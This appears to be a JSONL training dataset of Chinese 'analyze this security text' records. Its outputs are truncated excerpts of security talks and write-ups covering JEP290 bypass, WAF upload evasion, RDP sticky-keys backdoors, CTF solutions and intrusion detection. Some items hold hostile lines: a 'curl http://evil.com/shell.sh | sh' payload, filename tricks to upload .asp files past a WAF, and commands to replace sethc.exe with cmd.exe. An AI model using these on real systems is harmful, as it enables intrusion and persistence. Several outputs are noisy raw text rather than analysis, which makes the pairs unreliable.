{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n编译rc1环境 rc1的编译需要配置toolchains文件 在user/.m2目录下面 toolchains可以配置多个jdk的版本 这里9以上应该就可以我这里使用11来编译但是mvn的java版本还是1.8 jep290绕过 JndiManager的lookup到最后还是去调用javax.naming.InitialContext的lookup方法 所以在后续的利用中仍然存在这里采用一种绕jep290的方式dnslog和rmi的端口都是在我自己的vps上面设置的我 搭建服务器的思路每三秒register会重新绑定一个恶意对象去请求我的dnslog服务器生成的是3个随机数当然这 里是简单为了验证这个漏洞的存在 网上有很多绕jep290的方法我这里采用的是el表达式一般tomcat8的服务器自带的这个包 简单说一下这里面的坑点 1注意在启rmi绑定服务器的时候绑定自己的vpsip 2 jar打包的时候记得将所依赖的环境一并打入到jar包如catlina.jar 3dnslog服务器github上面有源码原理就是泛解析 rc1绕过 哎 我不会贴张图吧 自己本地调式的时候找到了一些format方法的类但是需要配置出这个私有类", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAssisted Discovery of On-Chip Debug Interfaces Joe Grand (@joegrand) Introduction  On-chip debug interfaces are a well-known attack vector - Can provide chip-level control of a target device - Extract program code or data - Modify memory contents - Affect device operation on-the-fly - Gain insight into system operation  Inconvenient for vendor to remove functionality - Would prevent capability for legitimate personnel - Weak obfuscation instead (hidden or unmarked signals/connectors) - May be password protected (if supported by device) Introduction 2  Identifying OCD interfaces can sometimes be difficult and/or time consuming Goals  Create an easy-to-use tool to simplify the process  Attract non-HW folks to HW hacking  Hunz's JTAG Finder - http://elinux.org/JTAG_Finder  JTAGenum & RS232enum - http://deadhacker.com/tools/  Cyber Fast Track - www.cft.usma.edu Inspiration Other Art  An Open JTAG Debugger (GoodFET), Travis Goodspeed, DEFCON 17 - http://defcon.org/html/links/dc-archives/dc-17- archive.html#Goodspeed2  Blackbox JTAG Reverse Engineering, Felix Domke, 26C3 - http://events.ccc.de/congress/2009/Fahrplan/ attachments/1435_JTAG.pdf Other Art 2  Forensic Imaging of Embedded Systems using JTAG, Marcel Breeuwsma (NFI), Digital Investigation Journal, March 2006 - http://www.sciencedirect.com/science/article/pii/ S174228760600003X Identifying Interfaces: External  Accessible to the outside world - Intended for engineers or manufacturers - Device programming or final system test  Usually hidden or protected - Underneath batteries - Behind stickers/covers  May be a proprietary/non-standard connector Identifying Interfaces: Internal  Test points or unpopulated pads  Silkscreen markings or notation  Easy-to-access locations Identifying Interfaces: Internal 2  Familiar target or based on common pinouts - Often single- or double-row footprint - JTAG: www.jtagtest.com/pinouts/  www.blackhat.com/html/bh-us-10/bh-us-10-archives.html#Jack  www.nostarch.com/xboxfree Identifying I", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n数据挖掘赋能安全感知 阿里云大数据入侵检测实践 Han Zheng 资深安全工程师 2019年5月29日 Yue Xu 安全工程师 团队成员 任职于阿里巴巴云安全中心负责算法实现和入侵检测与威胁情 报的研发团队 Han ZhengYue XuWei He 云 + 安全性 优势  数据计算能力  丰富的安全日志  从上帝视角来看数据 挑战  庞大的业务环境  从脚本小子到国家多方遇敌  精确率和召回率都让人担忧 数据流 威胁建模案例表  暴力攻击  恶意行为链  恶意 Web 脚本即 Webshell  攻击载荷回溯 威胁建模案例表  暴力攻击  恶意行为链  恶意 Web 脚本即 Webshell  攻击载荷回溯 基于规则的决策所存在的问题 服务器登录事件的特征  基于规则的决策 难以在假正率False Positive和真负率True Negative 之间取得平衡  不同服务器有着 不同的行为并非所有 情况都能事先了解 多元高斯模型 查找异常行为 高斯分布 威胁建模案例表  暴力攻击  恶意行为链  恶意 Web 脚本即 Webshell  攻击载荷回溯 恶意行为链 模式挖掘 流程文件和网络的链接 生成强关联规则 DDG 挖掘命令 匹配到的模式 威胁建模案例表  暴力攻击  恶意行为链  恶意 Web 脚本即 Webshell  攻击载荷回溯 恶意 Web 脚本 两类恶意 PHP 脚本Webshell 特征 01 文本 03 动态函数调用 02 opcode 机器学习性能 每日遭感染主机数2 - 4 月 机器学习技 术的改进 基于规则 的结果 实验室性能 针对 30,000 个样本进行测试 实现了F1=98.78%, AUC=99.97% 上线后性能 检测率提高 17%3 个月内仅一次假阳性 警报 威胁建模案例表  暴力攻击  恶意行为链  恶意 Web 脚本即 Webshell  攻击载荷回溯 自动化攻击回溯 发现恶意进程 curl http://evil.com/shell.sh | sh 如何被入侵的 攻击者的 HTTP 请求为 POST /XXX/XXXX HTTP/1.1 Host: xxx.xx.xxx:7001 cmd=curl http://evil.com/shell.sh | sh&XXXXXXXXXX 文本相似性分析 问题 如果攻击者的载荷 被编码/加密呢 编码后载荷回溯 解决了 在不具备文本特征且对弱点不了解情 况下进行载荷回溯的能力 仅适用于 一对多攻击 编码后载荷回溯案例 发现Webshell 连接流 载荷使用 base64 编码 编码后载荷回溯案例 发现Java 反序列化利用 载荷通过 Java 序列化 编码 编码后载荷回溯案例 发现SQL 注入导致的 RCE RCE 载荷隐藏在一个 特殊的六进制字符串 中 借助数据挖掘增强安全感知能力  标签数据的缺乏 和不明确的 威胁边界 限制了机器学习在安全领域的 表现  面对网络威胁AI 并非万灵药更重要的是确定 何时需要 AI 以及如何对效果进行量化  没有免费的午餐您必须根据具体项目的 实际情况 选择最适合的算 法 云 + 安全性 优势和挑战 威胁建模案例  暴力攻击  异常进程启动  恶意 Web 脚本即 Webshell  攻击载荷回溯 问答 Enhance Security Awareness with Data Mining Han Zheng zhenghan.zh@alibaba-inc.com Yue Xu lezhen.xy@alibaba-inc.com 郑瀚Andrew_Hann cdxy000 cdxy_ 数据挖掘赋能安全感知阿里云大数据入侵检测实践", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n原始默认状态 1 2 3 WebKitFormBoundary2smpsxFB3D0KbA7D ContentDisposition: formdata name=filepath filename=backlion.asp ContentType: text/html 突破0文件名前缀加[0x09]绕过 1 2 3 WebKitFormBoundary2smpsxFB3D0KbA7D ContentDisposition: formdata name=filepath filename=[0x09]backlion.asp ContentType: text/html 突破1文件名去掉双引号绕过 1 2 3 WebKitFormBoundary2smpsxFB3D0KbA7D ContentDisposition: formdata name=filepath filename=backlion.asp ContentType: text/html 突破2添加一个filename1的文件名参数并赋值绕过 1 2 3 WebKitFormBoundary2smpsxFB3D0KbA7D ContentDisposition: formdata name=filepath filename=backlion.aspfilename1=test.jpg ContentType: text/html 突破3 form变量改成f+orm组合绕过 1 2 3 WebKitFormBoundary2smpsxFB3D0KbA7D ContentDisposition: f+ormdata name=filepathfilename=backlion.asp ContentType: text/html 突破4 文件名后缀大小写绕过 1 2 3 WebKitFormBoundary2smpsxFB3D0KbA7D ConTentDisposition: formdata name=filepath filename=backlion.Asp ContentType: text/html 突破5 去掉form-data变量绕过 1 2 3 WebKitFormBoundary2smpsxFB3D0KbA7D ConTentDisposition: name=filepath filename=backlion.asp ContentType: text/html 突破6在Content-Disposition:后添加多个空格 或者在form-data;后添加多个 空格绕过 1 2 3 WebKitFormBoundary2smpsxFB3D0KbA7D ConTentDisposition: formdata  name=filepath filename=backli ContentType: text/html 或者 1 2 3 WebKitFormBoundary2smpsxFB3D0KbA7D ConTentDisposition: ContentType: text/html 突破7 backlion.asp . (空格+.)绕过 1 WebKitFormBoundary2smpsxFB3D0KbA7D 2 3 ConTentDisposition: formdata name=filepath filename=backlion.asp . ContentType: text/html 突破8 回车换行绕过 1 2 3 4 WebKitFormBoundary2smpsxFB3D0KbA7D ConTentDisposition: formdata name=filepath filename=backlion.asp  ContentType: text/html 突破9 NTFS流 在文件名后加::$DATA绕过 1 2 3 WebKitFormBoundary2smpsxFB3D0KbA7D ConTentDisposition: formdata name=filepath filename=backlion.asp::$DATA ContentType: text/html 或者 1 2 3 WebKitFormBoundary2smpsxFB3D0KbA7D ConTentDisposition: formdata name=filepath filename=backlion.asp::$DATA\\0x00\\fuck.asp0x00.j ContentType: text/html 突破10 经过对IIS 6.0的测试发现其总是采用第一个Content-Disposition中 的值做为接收参数而安全狗总是以最后一个", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# zip (300, coding) > We found a strange zip file. Sadly the content is encrypted. As only criminals encrypt their stuff we need to decrypt this urgently. > Flag format is FLAGB**************S. In this task we got a zip file containing a couple of other small zip files. All of them were encrypted, but their size was only up to 5 bytes - just like in recent [Backdoor CTF task](https://github.com/p4-team/ctf/tree/master/2016-06-04-backdoor-ctf/crypto_crc). See that writeup for details. After decrypting, this is what we got: ``` 1 main( 2 ){int 3 n=24 4 ;whil 5 e(n-- 6 ){put 7 char( 8 9 10 ]n); 11 }} ``` Files 8 and 9 were missing. However, basing on flag format from task description, we could guess what should go in these empty places: ``` In [1]: s=\"FLAGB\" In [2]: for i, c in zip(range(23,0,-1), s): ...: print chr(ord(c)i) ...: Q Z T S Q ``` It might be a bit of guess, but we see that the last letter is the same as the first one, indicating period equal to 4. If we put `\"STZQ` in file 8, and `\"[n%4` in file 9, then both files have size equal to 5, just like the others, and the output of compiled program matches flag format. ``` main(){int n=24;while(n--){putchar(\"STZQ\"[n%4]n);}} // Prints FLAGBHECTY_ZP][V\\QWRXUS ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe End of the PSTN As You Know It DEF CON 20 July 28, 2012 Agenda Islands of VoIP Tool release UC Federation Surprise UCF Vendor Research Open Source Software Avaya Proprietary - Do not reproduce or distribute without express written consent Small Disclaimer These are our opinions based on experience Not necessarily the official position of our employer These issues are large and complex  We are here to explore an idea Were not finished with this research  (In fact, were just getting started) Avaya Proprietary - Do not reproduce or distribute without express written consent About VIPER VIPER Lab (Voice over IP Exploit Research) 1. Security Assessment for VoIP/UC 2. R&D Lab for vulnerability research around UC/VoIP Avaya Proprietary - Do not reproduce or distribute without express written consent Avaya Proprietary - Do not reproduce or distribute without express written consent A long time ago, in a land far away Avaya Proprietary - Do not reproduce or distribute without express written consent A VoIP Pentest took place 7 Islands of VoIP Islands of VoIP Avaya Proprietary - Do not reproduce or distribute without express written consent Company A Company B Company C PSTN SIP Trunk SIP Trunk TDM Trunk Carrier Carrier Carrier How to Connect Islands of VoIP? ENUM Avaya Proprietary - Do not reproduce or distribute without express written consent ENUM How it works Uses DNS NAPTR records to map E.164 telephone numbers to a URI (SIP URI) When you dial a telephone number, you dont know for certain if its connected to PSTN or a SIP network Solves problem of dialing between SIP networks when you only have a telephone number Adoption rate Hasnt seen widespread adoption Political, Economic reasons Avaya Proprietary - Do not reproduce or distribute without express written consent ENUM Experiment www.e164.org Public ENUM Directory They have a form and validation procedure for adding your telephone number and SIP URI to their directory We tried adding ourselves in using their proced", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDon M. Blumenthal Defcon 16 Defcon 16 Las Vegas, Nevada August 9, 2008 g  2008  Don M. Blumenthal Opinions expressed are my own and intended f i f ti l Th h ld t for informational purposes. They should not be attributed to any organization or used as a substitute for direct legal or technical advice. g Laws vary R l i Regulations vary Policies vary Procedures vary Procedures vary Individuals vary Necessary tactics vary y y However. The fundamental points do not vary Show respect D t l me Dont play games Civil  Court  Administrative Criminal Criminal Federal State State Gramm Leach Bliley Act Gramm-Leach-Bliley Act Fair Credit Reporting Act/Fair and Accurate Credit Transaction Act Accurate Credit Transaction Act Health Insurance Portability and Accountability Act Family Educational Rights and Privacy Act USA Patriot Act FTC Act Section 5 Sarbanes Oxley  2008  Don M. Blumenthal GLBA  eight agencies FCRA/FACTA FTC FCRA/FACTA - FTC Sarbanes Oxley  SEC HIPAA HHS HIPAA - HHS FERPA  DoE Patriot Act - DoJ Patriot Act - DoJ  2008  Don M. Blumenthal Formal investigation V l t  Voluntary response  Mandatory response Target or third party g p y Just between you, me, and the lamp post.  Procedural assistance  Procedural assistance  Investigation assistance  General information Access letter or similar document document  AKA Voluntary process We have opened a law p enforcement investigation. Please provide documents responsive to the following responsive to the following questions. The term \"documents\" means all written, recorded, and graphic materials and all electronic data of every kind in the possession, custody or control of the h h ff h p , y company, whether on or off company premises.The term \"documents\" includes electronic mail or correspondence, drafts of documents, metadata, embedded, hidden and other bibliographic or h l d d b l d , g p historical data describing or relating to documents created, revised, or distributed on computer systems. . . . Therefore, the compan", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSources of EMR Sources of EMR Human Brain Power Lines (50,60Hz) Induction Heating Cell phone Micro- wave oven Radar Light bulb People Radio tower X-Ray machines Radioac- tive elements Sizes of EMR Sizes of EMR Earth 12,756 km Football Field 100m House 12m Football 308mm People 1.8m Honey Bee 1.2cm Single Cell 10µm Water Molecule 0.3nm Bacteria 3µm- 800nm Virus 17- 300nm GAMMA RAYS X-RAYS ULTRAVIOLET VISIBLE INFRARED MICROWAVE RADIO WAVES Frequency Wavelength Energy 0.1Hz δ (Delta brain waves) 3Hz θ (Theta brain waves) 8Hz 8Hz α (Alpha brain waves) 12Hz β (Low Beta brain waves) 15Hz β (Mid Beta brain waves) 18Hz β (High Beta brain waves) 30Hz γ (Gamma brain waves) S S S S S S S 50Hz Power v= 100Hz Lights p= 60Hz Power v= 120Hz Lights p= 150Hz 3rd harmonic 180Hz 3rd harmonic 400Hz Airplane Power AM Radio 540 600 700 800 900 1000 1100 1200 1300 1400 1500 1600 A Ground Wave Emergency Network Europe and Asia AM EU&Asia AM Radiolocation Maritime Mobile Maritime Mobile Navigational Beacons Navigational Beacons Marine Radio Marine Radio Morse code SOS Beacons X-Band Beacons Marine SOS Marine Marine Aeronautical Aero LORAN-C navigation Radionavigation Maritime Mobile Maritime Mobile Maritime Mobile Maritime Mobile Maritime Mobile Maritime Mobile Marine Marine Aero Marine Aero Marine Aero International Intnl. and relays Aero Marine Marine Aero Marine Remote Ctrl CB 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 Aeronautical FM Radio 87.7 92.1 96.1 100.1 104.1 107.9 Marine Mobile Military Military Gov 160 Meters Ham Radio 120m Tropics 90m 80m Ham Radio 60m Tropics 49m 40m Ham 25m 22m 20m 19m 16m 15m 13m 11m 10m Ham 6m Ham Radio 2m 1 1/4m 3/4 m Ham 0.3GHz Microwave P-band (Previous) u 1GHz Microwave L-band (Long) H T-7 T-8 T-9 T-10 T-11 T-12 T-13 T-14 2 3 4 05 06 95 96 97 98 99 07 08 09 10 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n掃吧你從協議面抓出機歪的 遠端桌面後門 orange@chroot.org About Me  蔡政達 aka Orange  CHROOT 成員  DEVCORE Security Consultant  HITCON, PHPCONF, PYCON 等講師  揭露過 Microsoft, Django, Yahoo 等漏洞  專精於駭客手法Web Security 與網路滲透 水議題? 老議題? old issue ? yes, it is. 遠端桌面後門? Remote Desktop Backdoor ? 遠端桌面 \"相黏鍵\" 後門? Remote Desktop \"StickKeys\" Backdoor ? 遠端桌面後門?  透過再未輸入有效登入憑證的狀況下使 用作業系統自帶的功能繞過限制 安裝方法  C:\\windows\\system32\\sethc.exe  shift * 5  C:\\windows\\system32\\utilman.exe  Windows + U  C:\\windows\\system32\\osk.exe  輔助鍵盤  ... 安裝方法 v1  直接覆蓋  copy /y cmd.exe C:\\windows\\system32\\sethc.exe  copy /y cmd.exe :\\windows\\system32\\dllcache \\sethc.exe  takeown /f sethc.exe  echo y | cacls sethc.exe /G administrator:F 安裝方法 v2  映像劫持  EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion \\Image File Execution Options\\sethc.exe', 'debugger', 'reg_sz', 'C:\\windows\\system32\\cmd.exe' 如果要用圖片來說明 當然笨蛋才不加密 當然有些也是可以被繞過的 Windows 2000 輸入法漏洞 講古 What I Want to Do ? What I Want to Do ?  RDP Scanner 1. RDP Info 2. Check Backdoor 3. Maybe check weak password  ./rdp_scan 0.0.0.0/0 有沒有工具可以檢測這種後門? 當需要批量檢查時怎麼辦? From BH 03  Windows 2000 mstsc.exe has an undocumented API  mstsc.exe /CLXDLL=clxtshar.dll  smclient.exe ( Windows 2000 resource toolkit )  TSGrinder  RDP Risk Checker  by xtiger 開始研究 RDP Protocol 研究方法?  微軟貌似有出 RDP Spec  MS-RDPBCGR ( Basic Connectivity and Graphics Remoting )  MS-RDPEGDI  MS-RDPERP  MS-RDPNSC  ... 研究方法?  從 Open Source 開始研究?  RDesktop  Proper-JavaRDP / Lixia-JavaRDP  FreeRDP RDP Protocol  Connection Negotiation  Native RDP  TLS  NLA RDP Protocol  MCS - Multipoint Communication Service  Create channel  Join channel  Clipboard, sound, Device redirect, File sharing ... RDP Protocol  Security Exchange  Encryption Mode  FIPS 140-1  RSA with RC4 ( 40, 128 bit key )  Exchange Public Key and Client/Server Random RDP Protocol  RDP Setting Exchange  Client Info  username, password, hostname ...  xfreerdp -n client_hostname <IP>  Capabilities  Orders Support ?  Font, Color, Keyboard, Pointer,", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# GIF ## 文件结构 一个GIF文件的结构可分为 - 文件头File Header - GIF 文件署名Signature - 版本号Version - GIF 数据流GIF Data Stream - 控制标识符 - 图象块Image Block - 其他的一些扩展块 - 文件终结器Trailer 下表显示了一个 GIF 文件的组成结构 中间的那个大块可以被重复任意次 ### 文件头 GIF 署名Signature和版本号VersionGIF 署名用来确认一个文件是否是 GIF 格式的文件这一部分由三个字符组成`GIF`文件版本号也是由三个字节组成可以为 `87a` 或 `89a` ### 逻辑屏幕标识符Logical Screen Descriptor Logical Screen Descriptor逻辑屏幕描述符紧跟在 header 后面这个块告诉 decoder解码器图片需要占用的空间它的大小固定为 7 个字节以 canvas width画布宽度和 canvas height画布高度开始 ### 全局颜色列表Global Color Table GIF格式可以拥有global color table或用于针对每个子图片集提供local color table每个color table由一个RGB就像通常我们见到的25500红色 那种列表组成 ### 图像标识符Image Descriptor 一个 GIF 文件一般包含多个图片之前的图片渲染模式一般是将多个图片绘制到一个大的virtual canvas虚拟画布上而现在一般将这些图片集用于实现动画 每个 image 都以一个 image descriptor block图像描述块作为开头这个块固定为 10 字节 ### 图像数据Image Data 终于到了图片数据实际存储的地方Image Data是由一系列的输出编码output codes构成它们告诉decoder解码器需要绘制在画布上的每个颜色信息这些编码以字节码的形式组织在这个块中 ### 文件终结器Trailer 该块为一个单字段块用来指示该数据流的结束取固定值0x3b. 更多参见 [gif 格式图片详细解析](http://www.jianshu.com/p/df52f1511cf8) ## 空间轴 由于GIF的动态特性由一帧帧的图片构成所以每一帧的图片多帧图片间的结合都成了隐藏信息的一种载体 对于需要分离的GIF文件,可以使用`convert`命令将其每一帧分割开来 ```console $ convert cake.gif cake.png $ ls cake-0.png cake-1.png cake-2.png cake-3.png cake.gif ``` ### 例题 > WDCTF-2017:3-2 打开gif后思路很清晰分离每一帧图片后将起合并得到完整的二维码即可 ```python from PIL import Image flag = Image.new(\"RGB\",(450,450)) for i in range(2): for j in range(2): pot = \"cake-{}.png\".format(j+i*2) potImage = Image.open(pot) flag.paste(potImage,(j*225,i*225)) flag.save('./flag.png') ``` 扫码后得到一串16进制字符串 `03f30d0ab8c1aa5....74080006030908` 开头`03f3`为`pyc`文件的头恢复为`python`脚本后直接运行得到flag ## 时间轴 GIF文件每一帧间的时间间隔也可以作为信息隐藏的载体 例如在当时在XMan选拔赛出的一题 > XMAN-2017:100.gif 通过`identify`命令清晰的打印出每一帧的时间间隔 ```shell $ identify -format \"%s %T \\n\" 100.gif 0 66 1 66 2 20 3 10 4 20 5 10 6 10 7 20 8 20 9 20 10 20 11 10 12 20 13 20 14 10 15 10 ``` 推断 `20 & 10` 分别代表 `0 & 1`提取每一帧间隔并进行转化 ```shell $ cat flag|cut -d ' ' -f 2|tr -d '66'|tr -d '\\n'|tr -d '0'|tr '2' '0' 010110000100110101000001010011100111101100111001001101100011010100110111001101010110001001100101011", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Gitroot > https://download.vulnhub.com/gitroot/GitRoot.ova 靶场IP`192.168.2.20` 扫描对外端口服务 ``` (rootkali)-[~/Desktop] # nmap -p1-65535 -sV 192.168.2.20 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-13 08:43 EDT Nmap scan report for 192.168.2.20 Host is up (0.00024s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) 11211/tcp open memcache? 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port11211-TCP:V=7.92%I=7%D=9/13%Time=63207B0C%P=x86_64-pc-linux-gnu%r(R SF:PCCheck,27,\"\\x81\\0\\0\\0\\0\\0\\0\\x81\\0\\0\\0\\x0f\\0\\0\\0\\x02\\0\\0\\0\\0\\0\\0\\0\\0Unk SF:nown\\x20command\"); MAC Address: 08:00:27:DF:CD:B2 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 86.36 seconds ``` 访问80端口 ![image-20220913204538917](../../.gitbook/assets/image-20220913204538917.png) 配置本地hosts ``` 192.168.2.20 wp.gitroot.vuln 192.168.2.20 gitroot.vuln ``` 访问`http://wp.gitroot.vuln` ![image-20220913204642561](../../.gitbook/assets/image-20220913204642561.png) 爆破子域名 ``` (rootkali)-[/tmp] # gobuster vhost -u gitroot.vuln -w /usr/share/wordlists/dirb/common.txt | grep 200 Found: repo.gitroot.vuln (Status: 200) [Size: 438] Found: wp.gitroot.vuln (Status: 200) [Size: 10697] ``` 配置本地hosts ``` 192.168.2.20 repo.gitroot.vuln ``` 访问`http://repo.gitroot.vuln` ![image-20220913214559249](../../.gitbook/assets/image-20220913214559249.png) 爆破目录 ``` (rootkali)-[/tmp] # gobuster dir -u http://repo.gitroot.vuln/ -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) ==", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nICS 35.240.40 CCS A 11 JR 中 华 人 民 共 和 国 金 融 行 业 标 准 JR/T 01962020 多方安全计算金融应用技术规范 Secure multi-party computation financial application technical specification 2020 - 11 - 24 发布 2020 - 11 -24 实施 中国人民银行 发 布 JR/T 01962020 I 目 次 前言 ..................................................................................II 1 范围 ................................................................................1 2 规范性引用文件 ......................................................................1 3 术语和定义 ..........................................................................1 4 缩略语 ..............................................................................3 5 概述 ................................................................................3 5.1 MPC 参与方及工作时序 .............................................................3 5.2 应用目标 ........................................................................4 5.3 总体要求 ........................................................................5 6 基础要求 ............................................................................5 6.1 数据输入 ........................................................................5 6.2 算法输入 ........................................................................6 6.3 协同计算 ........................................................................6 6.4 结果输出 ........................................................................7 6.5 调度管理 ........................................................................7 7 安全要求 ............................................................................7 7.1 协议安全 ........................................................................7 7.2 隐私数据安全 ....................................................................8 7.3 认证授权 ........................................................................8 7.4 密码安全 ........................................................................8 7.5 通信安全 ........................................................................8 7.6 存证与日志 ........", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2014 The MITRE Corporation. All rights reserved. C orey K allenberg Xeno K ovah John B ut t erw orth Sam C ornw ell Extreme Privilege Escalation on Windows 8/UEFI Systems @ coreykal @ xenokovah @jw but terw orth3 @ssc0rnw ell | 2 | Introduction Who we are:  Trusted Computing and firmware security researchers at The MITRE Corporation What MITRE is:  A not-for-profit company that runs six US Government \"Federally Funded Research & Development Centers\" (FFRDCs) dedicated to working in the public interest  Technical lead for a number of standards and structured data exchange formats such as CVE, CWE, OVAL, CAPEC, STIX, TAXII, etc  The first .org, !(.mil | .gov | .com | .edu | .net), on the ARPANET  2014 The MITRE Corporation. All rights reserved. | 3 | Attack Model (1 of 2) An attacker has gained administrator access on a victim Windows 8 machine But they are still constrained by the limits of Ring 3  2014 The MITRE Corporation. All rights reserved. | 4 | Attack Model (2 of 2) Attackers always want  More Power  More Persistence  More Stealth  2014 The MITRE Corporation. All rights reserved. | 5 | Typical Post-Exploitation Privilege Escalation Starting with x64 Windows vista, kernel drivers must be signed and contain an Authenticode certificate In a typical post-exploitation privilege escalation, the attacker wants to bypass the signed driver requirement to install a kernel level rootkit Various methods to achieve this are possible, including:  Exploit existing kernel drivers  Install a legitimate (signed), but vulnerable, driver and exploit it This style of privilege escalation has been well explored by other researchers such as [6][7]. There are other, more extreme, lands the attacker may wish to explore  2014 The MITRE Corporation. All rights reserved. | 6 | Other Escalation Options (1 of 2) There are other more interesting post-exploitation options an attacker may consider:  Bootkit the system  Install SMM rootkit  Install BIOS rootkit  2014 The MITRE Corporation. Al", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 代理技术相关研究 计划研究时间5天 ## 0. 前言 代理技术本质上是关于**IP资源**的对抗IP资源作为黑灰产基础设施之一 也是企业进行安全防护的一个重要切入点本篇从研究代理技术出发计划依次整理以下几个部分 - 代理技术 - 黑灰产常用解决方案 - 对抗手段 - 风控相关 - 安全攻防相关 - 体系建设思路 - 现有思路整理 - 发现思路 - 分类思路 - 情报体系 - 指标计算体系 - 展望 ## 1. 代理技术 ### 1.1 按匿名程度区分 以下是按代理技术的匿名程度作分类这里我们回顾一下HTTP请求头中的三个参数 - REMOTE_ADDR - 客户端跟服务器握手时候的IP即访问客户端的 IP 地址 - HTTP_VIA - 如果存在该信息, 则表明访问端主动承认其为代理服务器数值即为代理服务器的IP - HTTP_X_FORWARDED_FOR - HTTP扩展头部表明代理端的IP可能存在可伪造[1] #### 透明代理 透明代理Transparent Proxies 简单讲就是被访问端能识别其为代理服务且能识别真实IP > EMOTE_ADDR = ProxyIPHTTP_VIA = ProxyIPHTTP_X_FORWARDED_FOR = YourIP #### 普匿代理 普通匿名代理Anonymous Proxies 简单讲就是被访问端识别其使用了代理服务但隐藏了真实IP > REMOTE_ADDR = ProxyIPHTTP_VIA = ProxyIPHTTP_X_FORWARDED_FOR = ProxyIP #### 高匿代理 高级匿名代理High Anonymity Proxies (Elite proxies) 简单讲就是被访问端不知道访问端使用了代理服务也不知道其真实IP > REMOTE_ADDR = ProxyIPHTTP_VIA = NULLHTTP_X_FORWARDED_FOR = NULL #### 欺骗性代理 欺骗性代理Distorting Proxies 简单讲就是告知被访问端使用了代理服务但使用虚拟的随机IP代替真实IP从而达到欺骗的效果 > REMOTE_ADDR = ProxyIPHTTP_VIA = ProxyIPHTTP_X_FORWARDED_FOR = RandomIP ### 2. 按照使用技术区分 ### HTTP代理 ### Tor代理 ### 科学上网代理类 #### ShadowSocks #### V2ray #### Trojan ## 代理资源 请查看本文档的[IP资源整理](https://y1ng.org/TheRoadOfSO/0x2_%E9%BB%91%E7%81%B0%E4%BA%A7%E5%AF%B9%E6%8A%97/%3E%3E%3E%20%E5%9F%BA%E7%A1%80%E8%AE%BE%E6%96%BD/0x3_IP%E8%B5%84%E6%BA%90%E6%95%B4%E7%90%86/)篇章 ## References \\[1] 如何取得wap和web用户的真实IP[Albert陈凯](https://cloud.tencent.com/developer/user/1558124)https://cloud.tencent.com/developer/article/1350545", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDesign and Implementation of a Quantum Design and Implementation of a Quantum True Random Number Generator True Random Number Generator What is True Randomness? What is True Randomness?  Must be unpredictable.  Must be unpredictable.  For a given set of binary data 'i', the i+1  For a given set of binary data 'i', the i+1th th bit can only be bit can only be predicted with 50% accuracy. predicted with 50% accuracy.  Must be unbiased and nonalgorithmic. Computers can't do  Must be unbiased and nonalgorithmic. Computers can't do this (and neither can you!). this (and neither can you!).  Useful for cryptography, science, and games (gambling and  Useful for cryptography, science, and games (gambling and drinking). drinking). Types of Random Number Generators Types of Random Number Generators  Pseudorandom (PRNG): Uses an algorithm and a 'secret'  Pseudorandom (PRNG): Uses an algorithm and a 'secret' initial sequence. This is what your computer does. initial sequence. This is what your computer does.  True Random (TRNG): Samples a physical system of high  True Random (TRNG): Samples a physical system of high entropy. entropy.  Both are easy to design wrong and they fail silently!  Both are easy to design wrong and they fail silently! Types of TRNG Types of TRNG  Non Quantum: Samples a complex system of high  Non Quantum: Samples a complex system of high entropy (lavalamps, time between keypresses). entropy (lavalamps, time between keypresses).  Higher bandwidth, easier to construct, numbers are  Higher bandwidth, easier to construct, numbers are not produced by any obvious algorithm. not produced by any obvious algorithm.  Is complexity as good as randomness?  Is complexity as good as randomness? Types of TRNG Types of TRNG  Quantum TRNG (QTRNG): Samples a simple system of  Quantum TRNG (QTRNG): Samples a simple system of high entropy (behavior of single photons or particles). high entropy (behavior of single photons or particles).  Low bandwidth, difficult to sample 